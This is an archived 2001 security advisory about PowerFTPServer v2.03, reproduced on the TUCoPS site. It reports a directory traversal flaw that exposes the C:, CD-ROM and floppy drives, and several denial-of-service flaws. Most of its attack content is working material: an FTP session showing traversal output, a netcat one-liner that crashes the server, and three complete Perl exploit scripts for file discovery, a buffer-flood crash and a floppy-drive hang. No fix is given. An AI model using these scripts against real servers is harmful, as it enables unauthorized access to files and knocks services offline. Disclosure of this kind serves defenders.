Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win4886.htm

PowerFTPServer DoS



29th Nov 2001 [SBWID-4886]
COMMAND

	PowerFTPServer DoS

SYSTEMS AFFECTED

	PowerFTPServer v2.03

PROBLEM

	Alex Hernandez posted following
	

	PowerFTP Server is an FTP server for Windows 9x/NT/2000. A bug allows  any
	user to change to any directory and see files to  PATH  also  GET  files
	remotely.
	

	PowerFTP is a  powerful  FTP  client/server  software.  The  feature  of
	PowerFTP is the function of multiple thread downloading  and  uploading.
	it can even split one big file into several parts, and it can make  your
	computer as a standard FTP server but exist a big HOLES:
	

	 1) Reveling data sensitive REMOTE with account restricted on Drives

	    CDROM. Floppy and HDD Proof of concept.

	 2) Exploit code data revealing (Remote).

	 3) Remote DoS proof of concept. 

	 4) Exploit code DoS (Remote).

	 5) Exploit code DoS attack Floppy Drive (Remote).

	

	

	 Proof of concept

	 

	# uname -a

	SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

	#

	

	# ftp 10.0.0.1

	Connected to 10.0.0.1.

	220 Personal FTP Server ready

	Name (10.0.0.1:root): temp

	331 Password required for temp.

	Password:

	230 User temp logged in.

	ftp>

	ftp> pwd

	257 \"C:/WINDOWS/Application Data/Microsoft/Internet Explorer/Quick 

	Launch/Mis documentos/tools/\" is current directory.

	

	ftp> cd .../.../

	501 CWD failed. Cannot accept relative path using dot notation

	ftp>

	

	 ------oOo------

	 (1) Reveling Data C:\\ Drive, floppy A:\\ and CDROM, if u run something,

	 in this case exist a CD installation ENCARTA 2001 in Spanish u

	 can see all the files.

	 ------oOo------

	 

	ftp> ls ../../../../../../../

	200 Port command successful.

	150 Opening data connection for directory list.

	SUHDLOG.DAT

	COMMAND.COM

	BOOTLOG.PRV

	FRUNLOG.TXT

	DOS

	AUTOEXEC.DOS

	CONFIG.DOS

	VIDEOROM.BIN

	CONFIG.SYS

	DBLSPACE.BIN

	MSDOS.SYS

	MSDOS.---

	SETUPLOG.TXT

	WINDOWS

	test.txt.txt

	#

	226 File sent ok

	remote: ../../../../../../../

	561 bytes received in 0.12 seconds (4.61 Kbytes/s)

	ftp>

	

	 ------oOo------

	 Exist another method for view \"c:\\\" drive type the next:

	 ------oOo------

	 

	ftp> ls c:/

	200 Port command successful.

	150 Opening data connection for directory list. 

	SUHDLOG.DAT

	COMMAND.COM

	BOOTLOG.PRV

	FRUNLOG.TXT

	DOS

	[...]

	

	 ------oOo------ 

	 For list the files CDROM drive type the next:

	 ------oOo------

	 

	ftp> ls d:/

	200 Port command successful.

	150 Opening data connection for directory list.

	00000001.LT1

	AREF

	AUTORUN.EXE

	AUTORUN.INF

	AUTORUN.INI

	CLCD16.DLL

	CLCD32.DLL

	CLUF.TXT

	D6F04BA8.BIN

	DPLAYERX.DLL

	DRVMGT.DLL

	EE

	EEAUTO.ICO

	[...]

	

	 ------oOo------

	 For list the files Floppy drive type the next:

	 ------oOo------

	 

	ftp> ls a:/

	200 Port command successful.

	150 Opening data connection for directory list.

	

	NOTE: If not exist Diskket, u can listen how to run the Drive :-).
	

	 ------oOo-------------

	 Exploit Code PowerFTP_data.pl

	 ------oOo-------------

	 

	#!/usr/bin/perl

	# Simple script to view the files from the ftp server, 

	# even if they are outside of root directory.

	# 

	# This script assume OS WinNT/2k/W.x and it looked 

	# for direcories of IIS. 

	#

	# PowerFTP Server v2.03 proof-of-concept exploit

	# By Alex Hernandez  (C)2001.

	#

	# Thanks all the people from Spain and Argentina.

	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,

	# G.Maggiotti & H.Oliveira.

	# 

	#

	# Usage: perl -x PowerFTP_data.pl -s 

	#

	# Examples: 

	#

	# perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp

	# perl -x PowerFTP_data.pl -s 10.0.0.1

	# 

	

	use Getopt::Std;

	use IO::Socket;

	

	print(\"\\nPowerFTP server v2.03 Data revealing exploit (c)2001\\n\");

	print(\"Alex Hernandez al3xhernandez\\@ureach.com\\n\\n\");

	

	getopts(\'s:l:p:\',\\%args);

	my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res);

	

	$CRLF = \"\\015\\012\";

	@drives = (\"c\",\"d\",\"e\"); #Possible drives remotes

	# If u needed read the drive A floopy add this line

	# @drives = (\"a\",\"c\",\"d\",\"e\",\"f\".......etc,etc

	

	$port = 21;

	$login = \'temp\'; #Maybe u needed to change this

	$pass = \'temp\';	#Maybe u needed to change this	 

	

	

	if (defined $args{s}) { $host = $args{s}; } else 

	{ print \"No host specified.\\n\";

	  print \"Usage: $0 -s  -l  -p \\n\\n\";exit;

	}

	

	if (defined $args{l}) { $login = $args{l}; }

	if (defined $args{p}) { $pass = $args{p}; }

	

	$sock =

	IO::Socket::INET->new(Proto=>\'tcp\',PeerAddr=>$host,PeerPort=>$port) ||

	die(\"Socket errors: $!\");

	

	$sock_res = <$sock>;

	print $sock \"USER $login\" . $CRLF;

	$sock_res = <$sock>;

	print $sock \"PASS $pass\" . $CRLF;

	$sock_res = <$sock>;

	

	if ($sock_res !~ /230\\s/) { print \"Login/password not

	accepted...exiting.\\n\"; close($sock); exit; }

	

	print $sock \"PWD\" . $CRLF;

	$sock_res = <$sock>;

	

	print \"Attempting to locate system files...\";

	

	

	$win = &OS;

	$iis = &IIS;

	

	print \"done..\\n\\n\"; close($sock);

	

	print \"Windows directory: $win\\n\";

	print \"IIS dorectory: $iis\\n\";

	print \"Try manually on FTPserver $host: dir c:/\\n\\n\";

	exit;

	

	sub OS {

	my @win_dirs = (\"win\",\"windows\",\"winnt\",\"winme\");

	        foreach $drive (@drives)

	        {

	                

			foreach $dir (@win_dirs)

	                {

	                        print \".\";

				print $sock \"NLST $drive:/$dir/\" . $CRLF;

	                        $sock_res = <$sock>;

	

	                        if ($sock_res =~ /213\\s/) 

				{return(\"$drive:\\\\$dir\");}

	                }

	        }

	return(\"not found\");

	}

	

	sub IIS {

	my @iis_files = (\"Inetpub/wwwroot/\", \"Inetpub/wwwroot/cgi-bin/\");

	        foreach $drive (@drives)

	        {

	                foreach $file (@iis_files)

	                {

	                        print \".\";

				print $sock \"NLST $drive:/$file\" . $CRLF;

	                        $sock_res = <$sock>;

	                        if ($sock_res =~ /213\\s/) { 

	                                $file =~ s/\\//\\\\/g; 

	                                return(\"$drive:\\\\$file\");

	                        }

	                }

	        }

	

	return(\"not found\"); 

	}

	

	

	 ------oOo------

	 Remote Denial Of service

	 ------oOo------

	 

	# uname -a

	SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

	#

	

	# perl -e \' for ($i=1;$i<2049;$i++) { print \"A\";} \' | nc 10.0.0.1 21

	220 Personal FTP Server ready

	#

	

	Crash system and the admin need restart the service!
	 

	

	 ------oOo-------------

	 Exploit Code DoS PowerFTP_Dos.pl

	 ------oOo-------------

	 

	#!/usr/bin/perl

	# Simple script to send a long \'A^s\' command to the server, 

	# resulting in the ftpd crashing

	#

	# PowerFTP Server v2.03 proof-of-concept exploit

	# By Alex Hernandez  (C)2001.

	#

	# Thanks all the people from Spain and Argentina.

	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 

	# G.Maggiotti & H.Oliveira.

	# 

	#

	# Usage: perl -x PowerFTP_Dos.pl -s 

	#

	# Example: 

	#

	# perl -x PowerFTP_Dos.pl -s 10.0.0.1

	# 220 Personal FTP Server ready

	# Crash was successful !

	#

	

	use Getopt::Std;

	use IO::Socket;

	

	print(\"\\nPowerFTP server v2.03 DoS exploit (c)2001\\n\");

	print(\"Alex Hernandez al3xhernandez\\@ureach.com\\n\\n\");

	

	getopts(\'s:\', \\%args);

	if(!defined($args{s})){&usage;}

	$serv = $args{s};

	$foo = \"A\"; $number = 2048; 

	$data .= $foo x $number; $EOL=\"\\015\\012\";

	

	$remote = IO::Socket::INET->new(

	                    Proto => \"tcp\",

	                    PeerAddr => $args{s},

	                    PeerPort => \"ftp(21)\",

	                ) || die(\"Unable to connect to ftp port at $args{s}\\n\");

	

	$remote->autoflush(1);

	print $remote \"$data\". $EOL;

	while (<$remote>){ print }

	print(\"\\nCrash was successful !\\n\");

	

	

	sub usage {die(\"\\nUsage: $0 -s \\n\\n\");}

		

	 

	 ------oOo-------------

	 Exploit Code DoS attack floppy remote PowerFTP_floppy.pl

	 ------oOo-------------

	 

	#!/usr/bin/perl

	#

	# Even though the server will deny access, the slow hardware 

	# will still hang the machine. This program attempts to 

	# exploit this weakness by sending the \'NLST a:/\' command to 

	# the server 

	#

	# PowerFTP Server v2.03 proof-of-concept exploit

	# By Alex Hernandez  (C)2001.

	#

	# Thanks all the people from Spain and Argentina.

	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,

	# G.Maggiotti & H.Oliveira.

	# 

	#

	# Usage: perl -x PowerFTP_floppy.pl    

	#

	# Example: 

	#

	# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp

	# 

	

	use IO::Socket;

	

	print(\"\\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\\n\");

	print(\"Alex Hernandez al3xhernandez\\@ureach.com\\n\\n\");

	

	#$NUMBER_TO_SEND = 3000; 

	$BUFF = 3000; 

	

	if ( scalar @ARGV < 4 ) {

	    print \"Usage: $0    \\n\";

	    exit();

	}

	

	

	$target = $ARGV[ 0 ];

	$port = $ARGV[ 1 ];

	$username = $ARGV[ 2 ];

	$password = $ARGV[ 3 ];

	

	print \"Creating socket... \";

	$sock = new IO::Socket::INET( PeerAddr => $target,

	                              PeerPort => int( $port ), 

					Proto => \'tcp\' );

	die \"$!\" unless $sock;

	print \"done.\\n\";

	

	

	read( $sock, $buffer, 1 );

	

	

	print \"Sending username...\";

	print $sock \"USER \" . $username . \"\\n\";

	read( $sock, $buffer, 1 );

	print \"done.\\n\";

	

	

	print \"Sending password...\";

	print $sock \"PASS \" . $password . \"\\n\";

	read( $sock, $buffer, 1 );

	print \"done.\\n\";

	

	

	print \"DoS Attack floppy server...\";

	for( $i = 0; $i < $BUFF; $i++ ) {

	

	    print $sock \"NLST a:/\\n\";	

	    read( $sock, $buffer, 1 );

	}

	

	print \"done.\\n\";

	

	close( $sock );

	exit();

	

SOLUTION

	None yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH